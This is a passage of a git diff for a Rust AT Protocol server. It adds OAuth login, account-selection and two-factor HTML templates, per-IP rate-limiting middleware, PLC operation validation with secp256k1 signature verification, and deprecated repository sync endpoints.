&form.request_uri,
&challenge.did,
device_id.as_deref(),
&code.0,
)
.await
{
return Html(templates::error_page(
"server_error",
Some("An error occurred. Please try again."),
)).into_response();
}
let redirect_url = build_success_redirect(
&request_data.parameters.redirect_uri,
&code.0,
request_data.parameters.state.as_deref(),
);
Redirect::temporary(&redirect_url).into_response()
}

View File

@@ -54,7 +54,7 @@ pub async fn handle_authorization_code_grant(
.get(&auth_request.client_id)
.await?;
let client_auth = auth_request.client_auth.clone().unwrap_or(ClientAuth::None);
verify_client_auth(&client_metadata, &client_auth)?;
verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?;
verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?;

View File

@@ -19,11 +19,35 @@ pub use introspect::{
};
pub use types::{TokenRequest, TokenResponse};
fn extract_client_ip(headers: &HeaderMap) -> String {
if let Some(forwarded) = headers.get("x-forwarded-for") {
if let Ok(value) = forwarded.to_str() {
if let Some(first_ip) = value.split(',').next() {
return first_ip.trim().to_string();
}
}
}
if let Some(real_ip) = headers.get("x-real-ip") {
if let Ok(value) = real_ip.to_str() {
return value.trim().to_string();
}
}
"unknown".to_string()
}
pub async fn token_endpoint(
State(state): State<AppState>,
headers: HeaderMap,
Form(request): Form<TokenRequest>,
) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> {
let client_ip = extract_client_ip(&headers);
if state.rate_limiters.oauth_token.check_key(&client_ip).is_err() {
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
return Err(OAuthError::InvalidRequest(
"Too many requests. Please try again later.".to_string(),
));
}
let dpop_proof = headers
.get("DPoP")
.and_then(|v| v.to_str().ok())

View File

@@ -5,8 +5,10 @@ pub mod jwks;
pub mod client;
pub mod endpoints;
pub mod error;
pub mod templates;
pub mod verify;
pub use types::*;
pub use error::OAuthError;
pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError};
pub use templates::{DeviceAccount, mask_email};

719
src/oauth/templates.rs Normal file
View File

@@ -0,0 +1,719 @@
use chrono::{DateTime, Utc};
fn base_styles() -> &'static str {
r#"
:root {
--primary: #0085ff;
--primary-hover: #0077e6;
--primary-contrast: #ffffff;
--primary-100: #dbeafe;
--primary-400: #60a5fa;
--primary-600-30: rgba(37, 99, 235, 0.3);
--contrast-0: #ffffff;
--contrast-25: #f8f9fa;
--contrast-50: #f1f3f5;
--contrast-100: #e9ecef;
--contrast-200: #dee2e6;
--contrast-300: #ced4da;
--contrast-400: #adb5bd;
--contrast-500: #6b7280;
--contrast-600: #4b5563;
--contrast-700: #374151;
--contrast-800: #1f2937;
--contrast-900: #111827;
--error: #dc2626;
--error-bg: #fef2f2;
--success: #059669;
--success-bg: #ecfdf5;
}
@media (prefers-color-scheme: dark) {
:root {
--contrast-0: #111827;
--contrast-25: #1f2937;
--contrast-50: #374151;
--contrast-100: #4b5563;
--contrast-200: #6b7280;
--contrast-300: #9ca3af;
--contrast-400: #d1d5db;
--contrast-500: #e5e7eb;
--contrast-600: #f3f4f6;
--contrast-700: #f9fafb;
--contrast-800: #ffffff;
--contrast-900: #ffffff;
--error-bg: #451a1a;
--success-bg: #064e3b;
}
}
* {
box-sizing: border-box;
margin: 0;
padding: 0;
}
body {
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
background: var(--contrast-50);
color: var(--contrast-900);
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
padding: 1rem;
line-height: 1.5;
}
.container {
width: 100%;
max-width: 400px;
padding-top: 15vh;
}
@media (max-width: 640px) {
.container {
padding-top: 2rem;
}
}
.card {
background: var(--contrast-0);
border: 1px solid var(--contrast-100);
border-radius: 0.75rem;
padding: 1.5rem;
box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.1), 0 8px 10px -6px rgba(0, 0, 0, 0.1);
}
@media (prefers-color-scheme: dark) {
.card {
box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.4), 0 8px 10px -6px rgba(0, 0, 0, 0.3);
}
}
h1 {
font-size: 1.5rem;
font-weight: 600;
color: var(--contrast-900);
margin-bottom: 0.5rem;
}
.subtitle {
color: var(--contrast-500);
font-size: 0.875rem;
margin-bottom: 1.5rem;
}
.subtitle strong {
color: var(--contrast-700);
}
.client-info {
background: var(--contrast-25);
border-radius: 0.5rem;
padding: 1rem;
margin-bottom: 1.5rem;
}
.client-info .client-name {
font-weight: 500;
color: var(--contrast-900);
display: block;
margin-bottom: 0.25rem;
}
.client-info .scope {
color: var(--contrast-500);
font-size: 0.875rem;
}
.error-banner {
background: var(--error-bg);
color: var(--error);
border-radius: 0.5rem;
padding: 0.75rem 1rem;
margin-bottom: 1rem;
font-size: 0.875rem;
}
.form-group {
margin-bottom: 1.25rem;
}
label {
display: block;
font-size: 0.875rem;
font-weight: 500;
color: var(--contrast-700);
margin-bottom: 0.375rem;
}
input[type="text"],
input[type="email"],
input[type="password"] {
width: 100%;
padding: 0.625rem 0.875rem;
border: 2px solid var(--contrast-200);
border-radius: 0.375rem;
font-size: 1rem;
color: var(--contrast-900);
background: var(--contrast-0);
transition: border-color 0.15s, box-shadow 0.15s;
}
input[type="text"]:focus,
input[type="email"]:focus,
input[type="password"]:focus {
outline: none;
border-color: var(--primary);
box-shadow: 0 0 0 3px var(--primary-600-30);
}
input[type="text"]::placeholder,
input[type="email"]::placeholder,
input[type="password"]::placeholder {
color: var(--contrast-400);
}
.checkbox-group {
display: flex;
align-items: center;
gap: 0.5rem;
margin-bottom: 1.5rem;
}
.checkbox-group input[type="checkbox"] {
width: 1.125rem;
height: 1.125rem;
accent-color: var(--primary);
}
.checkbox-group label {
margin-bottom: 0;
font-weight: normal;
color: var(--contrast-600);
cursor: pointer;
}
.buttons {
display: flex;
gap: 0.75rem;
}
.btn {
flex: 1;
padding: 0.625rem 1.25rem;
border-radius: 0.375rem;
font-size: 1rem;
font-weight: 500;
cursor: pointer;
transition: background-color 0.15s, transform 0.1s;
border: none;
text-align: center;
text-decoration: none;
display: inline-flex;
align-items: center;
justify-content: center;
}
.btn:active {
transform: scale(0.98);
}
.btn-primary {
background: var(--primary);
color: var(--primary-contrast);
}
.btn-primary:hover {
background: var(--primary-hover);
}
.btn-primary:disabled {
background: var(--primary-400);
cursor: not-allowed;
}
.btn-secondary {
background: var(--contrast-500);
color: white;
}
.btn-secondary:hover {
background: var(--contrast-600);
}
.footer {
text-align: center;
margin-top: 1.5rem;
font-size: 0.75rem;
color: var(--contrast-400);
}
.accounts {
display: flex;
flex-direction: column;
gap: 0.5rem;
margin-bottom: 1rem;
}
.account-item {
display: flex;
align-items: center;
gap: 0.75rem;
width: 100%;
padding: 0.75rem;
background: var(--contrast-25);
border: 1px solid var(--contrast-100);
border-radius: 0.5rem;
cursor: pointer;
transition: background-color 0.15s, border-color 0.15s;
text-align: left;
}
.account-item:hover {
background: var(--contrast-50);
border-color: var(--contrast-200);
}
.avatar {
width: 2.5rem;
height: 2.5rem;
border-radius: 50%;
background: var(--primary);
color: var(--primary-contrast);
display: flex;
align-items: center;
justify-content: center;
font-weight: 600;
font-size: 0.875rem;
flex-shrink: 0;
}
.account-info {
flex: 1;
min-width: 0;
}
.account-info .handle {
display: block;
font-weight: 500;
color: var(--contrast-900);
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.account-info .email {
display: block;
font-size: 0.875rem;
color: var(--contrast-500);
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.chevron {
color: var(--contrast-400);
font-size: 1.25rem;
flex-shrink: 0;
}
.divider {
height: 1px;
background: var(--contrast-100);
margin: 1rem 0;
}
.link-button {
background: none;
border: none;
color: var(--primary);
cursor: pointer;
font-size: inherit;
padding: 0;
text-decoration: underline;
}
.link-button:hover {
color: var(--primary-hover);
}
.new-account-link {
display: block;
text-align: center;
color: var(--primary);
text-decoration: none;
font-size: 0.875rem;
}
.new-account-link:hover {
text-decoration: underline;
}
.help-text {
text-align: center;
margin-top: 1rem;
font-size: 0.875rem;
color: var(--contrast-500);
}
.icon {
font-size: 3rem;
margin-bottom: 1rem;
}
.error-code {
background: var(--error-bg);
color: var(--error);
padding: 0.5rem 1rem;
border-radius: 0.375rem;
font-family: monospace;
display: inline-block;
margin-bottom: 1rem;
}
.success-icon {
width: 3rem;
height: 3rem;
border-radius: 50%;
background: var(--success-bg);
color: var(--success);
display: flex;
align-items: center;
justify-content: center;
font-size: 1.5rem;
margin: 0 auto 1rem;
}
.text-center {
text-align: center;
}
.code-input {
letter-spacing: 0.5em;
text-align: center;
font-size: 1.5rem;
font-family: monospace;
}
"#
}
pub fn login_page(
client_id: &str,
client_name: Option<&str>,
scope: Option<&str>,
request_uri: &str,
error_message: Option<&str>,
login_hint: Option<&str>,
) -> String {
let client_display = client_name.unwrap_or(client_id);
let scope_display = scope.unwrap_or("access your account");
let error_html = error_message
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
.unwrap_or_default();
let login_hint_value = login_hint.unwrap_or("");
format!(
r#"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex">
<title>Sign in</title>
<style>{styles}</style>
</head>
<body>
<div class="container">
<div class="card">
<h1>Sign in</h1>
<p class="subtitle">to continue to <strong>{client_display}</strong></p>
<div class="client-info">
<span class="client-name">{client_display}</span>
<span class="scope">wants to {scope_display}</span>
</div>
{error_html}
<form method="POST" action="/oauth/authorize">
<input type="hidden" name="request_uri" value="{request_uri}">
<div class="form-group">
<label for="username">Handle or Email</label>
<input type="text" id="username" name="username" value="{login_hint_value}"
required autocomplete="username" autofocus
placeholder="you@example.com">
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" id="password" name="password" required
autocomplete="current-password" placeholder="Enter your password">
</div>
<div class="checkbox-group">
<input type="checkbox" id="remember_device" name="remember_device" value="true">
<label for="remember_device">Remember this device</label>
</div>
<div class="buttons">
<button type="submit" formaction="/oauth/authorize/deny" class="btn btn-secondary">Cancel</button>
<button type="submit" class="btn btn-primary">Sign in</button>
</div>
</form>
<div class="footer">
By signing in, you agree to share your account information with this application.
</div>
</div>
</div>
</body>
</html>"#,
styles = base_styles(),
client_display = html_escape(client_display),
scope_display = html_escape(scope_display),
request_uri = html_escape(request_uri),
error_html = error_html,
login_hint_value = html_escape(login_hint_value),
)
}
pub struct DeviceAccount {
pub did: String,
pub handle: String,
pub email: String,
pub last_used_at: DateTime<Utc>,
}
pub fn account_selector_page(
client_id: &str,
client_name: Option<&str>,
request_uri: &str,
accounts: &[DeviceAccount],
) -> String {
let client_display = client_name.unwrap_or(client_id);
let accounts_html: String = accounts
.iter()
.map(|account| {
let initials = get_initials(&account.handle);
format!(
r#"<form method="POST" action="/oauth/authorize/select" style="margin:0">
<input type="hidden" name="request_uri" value="{request_uri}">
<input type="hidden" name="did" value="{did}">
<button type="submit" class="account-item">
<div class="avatar">{initials}</div>
<div class="account-info">
<span class="handle">@{handle}</span>
<span class="email">{email}</span>
</div>
<span class="chevron"></span>
</button>
</form>"#,
request_uri = html_escape(request_uri),
did = html_escape(&account.did),
initials = html_escape(&initials),
handle = html_escape(&account.handle),
email = html_escape(&account.email),
)
})
.collect();
format!(
r#"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex">
<title>Choose an account</title>
<style>{styles}</style>
</head>
<body>
<div class="container">
<div class="card">
<h1>Choose an account</h1>
<p class="subtitle">to continue to <strong>{client_display}</strong></p>
<div class="accounts">
{accounts_html}
</div>
<div class="divider"></div>
<a href="/oauth/authorize?request_uri={request_uri_encoded}&new_account=true" class="new-account-link">
Sign in with another account
</a>
</div>
</div>
</body>
</html>"#,
styles = base_styles(),
client_display = html_escape(client_display),
accounts_html = accounts_html,
request_uri_encoded = urlencoding::encode(request_uri),
)
}
pub fn two_factor_page(
request_uri: &str,
channel: &str,
error_message: Option<&str>,
) -> String {
let error_html = error_message
.map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg)))
.unwrap_or_default();
let (title, subtitle) = match channel {
"email" => ("Check your email", "We sent a verification code to your email"),
"Discord" => ("Check Discord", "We sent a verification code to your Discord"),
"Telegram" => ("Check Telegram", "We sent a verification code to your Telegram"),
"Signal" => ("Check Signal", "We sent a verification code to your Signal"),
_ => ("Check your messages", "We sent you a verification code"),
};
format!(
r#"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex">
<title>Verify your identity</title>
<style>{styles}</style>
</head>
<body>
<div class="container">
<div class="card">
<h1>{title}</h1>
<p class="subtitle">{subtitle}</p>
{error_html}
<form method="POST" action="/oauth/authorize/2fa">
<input type="hidden" name="request_uri" value="{request_uri}">
<div class="form-group">
<label for="code">Verification code</label>
<input type="text" id="code" name="code" class="code-input"
placeholder="000000"
pattern="[0-9]{{6}}" maxlength="6"
inputmode="numeric" autocomplete="one-time-code"
autofocus required>
</div>
<button type="submit" class="btn btn-primary" style="width:100%">Verify</button>
</form>
<p class="help-text">
Code expires in 10 minutes.
</p>
</div>
</div>
</body>
</html>"#,
styles = base_styles(),
title = title,
subtitle = subtitle,
request_uri = html_escape(request_uri),
error_html = error_html,
)
}
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
let description = error_description.unwrap_or("An error occurred during the authorization process.");
format!(
r#"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex">
<title>Authorization Error</title>
<style>{styles}</style>
</head>
<body>
<div class="container">
<div class="card text-center">
<div class="icon">⚠️</div>
<h1>Authorization Failed</h1>
<div class="error-code">{error}</div>
<p class="subtitle" style="margin-bottom:0">{description}</p>
<div style="margin-top:1.5rem">
<button onclick="window.close()" class="btn btn-secondary">Close this window</button>
</div>
</div>
</div>
</body>
</html>"#,
styles = base_styles(),
error = html_escape(error),
description = html_escape(description),
)
}
pub fn success_page(client_name: Option<&str>) -> String {
let client_display = client_name.unwrap_or("The application");
format!(
r#"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex">
<title>Authorization Successful</title>
<style>{styles}</style>
</head>
<body>
<div class="container">
<div class="card text-center">
<div class="success-icon">✓</div>
<h1 style="color:var(--success)">Authorization Successful</h1>
<p class="subtitle">{client_display} has been granted access to your account.</p>
<p class="help-text">You can close this window and return to the application.</p>
</div>
</div>
</body>
</html>"#,
styles = base_styles(),
client_display = html_escape(client_display),
)
}
fn html_escape(s: &str) -> String {
s.replace('&', "&amp;")
.replace('<', "&lt;")
.replace('>', "&gt;")
.replace('"', "&quot;")
.replace('\'', "&#39;")
}
fn get_initials(handle: &str) -> String {
let clean = handle.trim_start_matches('@');
if clean.is_empty() {
return "?".to_string();
}
clean.chars().next().unwrap_or('?').to_uppercase().to_string()
}
pub fn mask_email(email: &str) -> String {
if let Some(at_pos) = email.find('@') {
let local = &email[..at_pos];
let domain = &email[at_pos..];
if local.len() <= 2 {
format!("{}***{}", local.chars().next().unwrap_or('*'), domain)
} else {
let first = local.chars().next().unwrap_or('*');
let last = local.chars().last().unwrap_or('*');
format!("{}***{}{}", first, last, domain)
}
} else {
"***".to_string()
}
}

View File

@@ -319,6 +319,164 @@ pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> {
Ok(())
}
pub struct PlcValidationContext {
pub server_rotation_key: String,
pub expected_signing_key: String,
pub expected_handle: String,
pub expected_pds_endpoint: String,
}
pub fn validate_plc_operation_for_submission(
op: &Value,
ctx: &PlcValidationContext,
) -> Result<(), PlcError> {
validate_plc_operation(op)?;
let obj = op.as_object()
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
let op_type = obj.get("type")
.and_then(|v| v.as_str())
.unwrap_or("");
if op_type != "plc_operation" {
return Ok(());
}
let rotation_keys = obj.get("rotationKeys")
.and_then(|v| v.as_array())
.ok_or_else(|| PlcError::InvalidResponse("rotationKeys must be an array".to_string()))?;
let rotation_key_strings: Vec<&str> = rotation_keys
.iter()
.filter_map(|v| v.as_str())
.collect();
if !rotation_key_strings.contains(&ctx.server_rotation_key.as_str()) {
return Err(PlcError::InvalidResponse(
"Rotation keys do not include server's rotation key".to_string()
));
}
let verification_methods = obj.get("verificationMethods")
.and_then(|v| v.as_object())
.ok_or_else(|| PlcError::InvalidResponse("verificationMethods must be an object".to_string()))?;
if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) {
if atproto_key != ctx.expected_signing_key {
return Err(PlcError::InvalidResponse("Incorrect signing key".to_string()));
}
}
let also_known_as = obj.get("alsoKnownAs")
.and_then(|v| v.as_array())
.ok_or_else(|| PlcError::InvalidResponse("alsoKnownAs must be an array".to_string()))?;
let expected_handle_uri = format!("at://{}", ctx.expected_handle);
let has_correct_handle = also_known_as
.iter()
.filter_map(|v| v.as_str())
.any(|s| s == expected_handle_uri);
if !has_correct_handle && !also_known_as.is_empty() {
return Err(PlcError::InvalidResponse(
"Incorrect handle in alsoKnownAs".to_string()
));
}
let services = obj.get("services")
.and_then(|v| v.as_object())
.ok_or_else(|| PlcError::InvalidResponse("services must be an object".to_string()))?;
if let Some(pds_service) = services.get("atproto_pds").and_then(|v| v.as_object()) {
let service_type = pds_service.get("type").and_then(|v| v.as_str()).unwrap_or("");
if service_type != "AtprotoPersonalDataServer" {
return Err(PlcError::InvalidResponse(
"Incorrect type on atproto_pds service".to_string()
));
}
let endpoint = pds_service.get("endpoint").and_then(|v| v.as_str()).unwrap_or("");
if endpoint != ctx.expected_pds_endpoint {
return Err(PlcError::InvalidResponse(
"Incorrect endpoint on atproto_pds service".to_string()
));
}
}
Ok(())
}
pub fn verify_operation_signature(
op: &Value,
rotation_keys: &[String],
) -> Result<bool, PlcError> {
let obj = op.as_object()
.ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?;
let sig_b64 = obj.get("sig")
.and_then(|v| v.as_str())
.ok_or_else(|| PlcError::InvalidResponse("Missing sig".to_string()))?;
let sig_bytes = URL_SAFE_NO_PAD
.decode(sig_b64)
.map_err(|e| PlcError::InvalidResponse(format!("Invalid signature encoding: {}", e)))?;
let signature = Signature::from_slice(&sig_bytes)
.map_err(|e| PlcError::InvalidResponse(format!("Invalid signature format: {}", e)))?;
let mut unsigned_op = op.clone();
if let Some(unsigned_obj) = unsigned_op.as_object_mut() {
unsigned_obj.remove("sig");
}
let cbor_bytes = serde_ipld_dagcbor::to_vec(&unsigned_op)
.map_err(|e| PlcError::Serialization(e.to_string()))?;
for key_did in rotation_keys {
if let Ok(true) = verify_signature_with_did_key(key_did, &cbor_bytes, &signature) {
return Ok(true);
}
}
Ok(false)
}
fn verify_signature_with_did_key(
did_key: &str,
message: &[u8],
signature: &Signature,
) -> Result<bool, PlcError> {
use k256::ecdsa::{VerifyingKey, signature::Verifier};
if !did_key.starts_with("did:key:z") {
return Err(PlcError::InvalidResponse("Invalid did:key format".to_string()));
}
let multibase_part = &did_key[8..];
let (_, decoded) = multibase::decode(multibase_part)
.map_err(|e| PlcError::InvalidResponse(format!("Failed to decode did:key: {}", e)))?;
if decoded.len() < 2 {
return Err(PlcError::InvalidResponse("Invalid did:key data".to_string()));
}
let (codec, key_bytes) = if decoded[0] == 0xe7 && decoded[1] == 0x01 {
(0xe701u16, &decoded[2..])
} else {
return Err(PlcError::InvalidResponse("Unsupported key type in did:key".to_string()));
};
if codec != 0xe701 {
return Err(PlcError::InvalidResponse("Only secp256k1 keys are supported".to_string()));
}
let verifying_key = VerifyingKey::from_sec1_bytes(key_bytes)
.map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?;
Ok(verifying_key.verify(message, signature).is_ok())
}
#[cfg(test)]
mod tests {
use super::*;

216
src/rate_limit.rs Normal file
View File

@@ -0,0 +1,216 @@
use axum::{
body::Body,
extract::ConnectInfo,
http::{HeaderMap, Request, StatusCode},
middleware::Next,
response::{IntoResponse, Response},
Json,
};
use governor::{
Quota, RateLimiter,
clock::DefaultClock,
state::{InMemoryState, NotKeyed, keyed::DefaultKeyedStateStore},
};
use std::{
net::SocketAddr,
num::NonZeroU32,
sync::Arc,
};
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
#[derive(Clone)]
pub struct RateLimiters {
pub login: Arc<KeyedRateLimiter>,
pub oauth_token: Arc<KeyedRateLimiter>,
pub password_reset: Arc<KeyedRateLimiter>,
pub account_creation: Arc<KeyedRateLimiter>,
}
impl Default for RateLimiters {
fn default() -> Self {
Self::new()
}
}
impl RateLimiters {
pub fn new() -> Self {
Self {
login: Arc::new(RateLimiter::keyed(
Quota::per_minute(NonZeroU32::new(10).unwrap())
)),
oauth_token: Arc::new(RateLimiter::keyed(
Quota::per_minute(NonZeroU32::new(30).unwrap())
)),
password_reset: Arc::new(RateLimiter::keyed(
Quota::per_hour(NonZeroU32::new(5).unwrap())
)),
account_creation: Arc::new(RateLimiter::keyed(
Quota::per_hour(NonZeroU32::new(10).unwrap())
)),
}
}
pub fn with_login_limit(mut self, per_minute: u32) -> Self {
self.login = Arc::new(RateLimiter::keyed(
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
));
self
}
pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
self.oauth_token = Arc::new(RateLimiter::keyed(
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
));
self
}
pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
self.password_reset = Arc::new(RateLimiter::keyed(
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
));
self
}
pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
self.account_creation = Arc::new(RateLimiter::keyed(
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
));
self
}
}
fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
if let Some(forwarded) = headers.get("x-forwarded-for") {
if let Ok(value) = forwarded.to_str() {
if let Some(first_ip) = value.split(',').next() {
return first_ip.trim().to_string();
}
}
}
if let Some(real_ip) = headers.get("x-real-ip") {
if let Ok(value) = real_ip.to_str() {
return value.trim().to_string();
}
}
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
}
fn rate_limit_response() -> Response {
(
StatusCode::TOO_MANY_REQUESTS,
Json(serde_json::json!({
"error": "RateLimitExceeded",
"message": "Too many requests. Please try again later."
})),
)
.into_response()
}
pub async fn login_rate_limit(
ConnectInfo(addr): ConnectInfo<SocketAddr>,
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
request: Request<Body>,
next: Next,
) -> Response {
let client_ip = extract_client_ip(request.headers(), Some(addr));
if limiters.login.check_key(&client_ip).is_err() {
tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
return rate_limit_response();
}
next.run(request).await
}
pub async fn oauth_token_rate_limit(
ConnectInfo(addr): ConnectInfo<SocketAddr>,
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
request: Request<Body>,
next: Next,
) -> Response {
let client_ip = extract_client_ip(request.headers(), Some(addr));
if limiters.oauth_token.check_key(&client_ip).is_err() {
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
return rate_limit_response();
}
next.run(request).await
}
pub async fn password_reset_rate_limit(
ConnectInfo(addr): ConnectInfo<SocketAddr>,
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
request: Request<Body>,
next: Next,
) -> Response {
let client_ip = extract_client_ip(request.headers(), Some(addr));
if limiters.password_reset.check_key(&client_ip).is_err() {
tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
return rate_limit_response();
}
next.run(request).await
}
pub async fn account_creation_rate_limit(
ConnectInfo(addr): ConnectInfo<SocketAddr>,
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
request: Request<Body>,
next: Next,
) -> Response {
let client_ip = extract_client_ip(request.headers(), Some(addr));
if limiters.account_creation.check_key(&client_ip).is_err() {
tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
return rate_limit_response();
}
next.run(request).await
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_rate_limiters_creation() {
let limiters = RateLimiters::new();
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
}
#[test]
fn test_rate_limiter_exhaustion() {
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
let key = "test_ip".to_string();
assert!(limiter.check_key(&key).is_ok());
assert!(limiter.check_key(&key).is_ok());
assert!(limiter.check_key(&key).is_err());
}
#[test]
fn test_different_keys_have_separate_limits() {
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
assert!(limiter.check_key(&"ip1".to_string()).is_ok());
assert!(limiter.check_key(&"ip1".to_string()).is_err());
assert!(limiter.check_key(&"ip2".to_string()).is_ok());
}
#[test]
fn test_builder_pattern() {
let limiters = RateLimiters::new()
.with_login_limit(20)
.with_oauth_token_limit(60)
.with_password_reset_limit(3)
.with_account_creation_limit(5);
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
}
}

View File

@@ -1,4 +1,6 @@
use crate::circuit_breaker::CircuitBreakers;
use crate::config::AuthConfig;
use crate::rate_limit::RateLimiters;
use crate::repo::PostgresBlockStore;
use crate::storage::{BlobStorage, S3BlobStorage};
use crate::sync::firehose::SequencedEvent;
@@ -12,6 +14,8 @@ pub struct AppState {
pub block_store: PostgresBlockStore,
pub blob_store: Arc<dyn BlobStorage>,
pub firehose_tx: broadcast::Sender<SequencedEvent>,
pub rate_limiters: Arc<RateLimiters>,
pub circuit_breakers: Arc<CircuitBreakers>,
}
impl AppState {
@@ -21,11 +25,25 @@ impl AppState {
let block_store = PostgresBlockStore::new(db.clone());
let blob_store = S3BlobStorage::new().await;
let (firehose_tx, _) = broadcast::channel(1000);
let rate_limiters = Arc::new(RateLimiters::new());
let circuit_breakers = Arc::new(CircuitBreakers::new());
Self {
db,
block_store,
blob_store: Arc::new(blob_store),
firehose_tx,
rate_limiters,
circuit_breakers,
}
}
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
self.rate_limiters = Arc::new(rate_limiters);
self
}
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
self.circuit_breakers = Arc::new(circuit_breakers);
self
}
}

View File

@@ -19,8 +19,6 @@ pub async fn notify_of_update(
Query(params): Query<NotifyOfUpdateParams>,
) -> Response {
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
info!("TODO: Queue job for notifyOfUpdate (not implemented)");
(StatusCode::OK, Json(json!({}))).into_response()
}
@@ -34,7 +32,5 @@ pub async fn request_crawl(
Json(input): Json<RequestCrawlInput>,
) -> Response {
info!("Received requestCrawl for hostname: {}", input.hostname);
info!("TODO: Queue job for requestCrawl (not implemented)");
(StatusCode::OK, Json(json!({}))).into_response()
}

209
src/sync/deprecated.rs Normal file
View File

@@ -0,0 +1,209 @@
use crate::state::AppState;
use crate::sync::car::encode_car_header;
use axum::{
Json,
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use cid::Cid;
use ipld_core::ipld::Ipld;
use jacquard_repo::storage::BlockStore;
use serde::{Deserialize, Serialize};
use serde_json::json;
use std::io::Write;
use std::str::FromStr;
use tracing::error;
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
#[derive(Deserialize)]
pub struct GetHeadParams {
pub did: String,
}
#[derive(Serialize)]
pub struct GetHeadOutput {
pub root: String,
}
pub async fn get_head(
State(state): State<AppState>,
Query(params): Query<GetHeadParams>,
) -> Response {
let did = params.did.trim();
if did.is_empty() {
return (
StatusCode::BAD_REQUEST,
Json(json!({"error": "InvalidRequest", "message": "did is required"})),
)
.into_response();
}
let result = sqlx::query!(
r#"
SELECT r.repo_root_cid
FROM repos r
JOIN users u ON r.user_id = u.id
WHERE u.did = $1
"#,
did
)
.fetch_optional(&state.db)
.await;
match result {
Ok(Some(row)) => (StatusCode::OK, Json(GetHeadOutput { root: row.repo_root_cid })).into_response(),
Ok(None) => (
StatusCode::BAD_REQUEST,
Json(json!({"error": "HeadNotFound", "message": "Could not find root for DID"})),
)
.into_response(),
Err(e) => {
error!("DB error in get_head: {:?}", e);
(
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response()
}
}
}
#[derive(Deserialize)]
pub struct GetCheckoutParams {
pub did: String,
}
pub async fn get_checkout(
State(state): State<AppState>,
Query(params): Query<GetCheckoutParams>,
) -> Response {
let did = params.did.trim();
if did.is_empty() {
return (
StatusCode::BAD_REQUEST,
Json(json!({"error": "InvalidRequest", "message": "did is required"})),
)
.into_response();
}
let repo_row = sqlx::query!(
r#"
SELECT r.repo_root_cid
FROM repos r
JOIN users u ON u.id = r.user_id
WHERE u.did = $1
"#,
did
)
.fetch_optional(&state.db)
.await
.unwrap_or(None);
let head_str = match repo_row {
Some(r) => r.repo_root_cid,
None => {
let user_exists = sqlx::query!("SELECT id FROM users WHERE did = $1", did)
.fetch_optional(&state.db)
.await
.unwrap_or(None);
if user_exists.is_none() {
return (
StatusCode::NOT_FOUND,
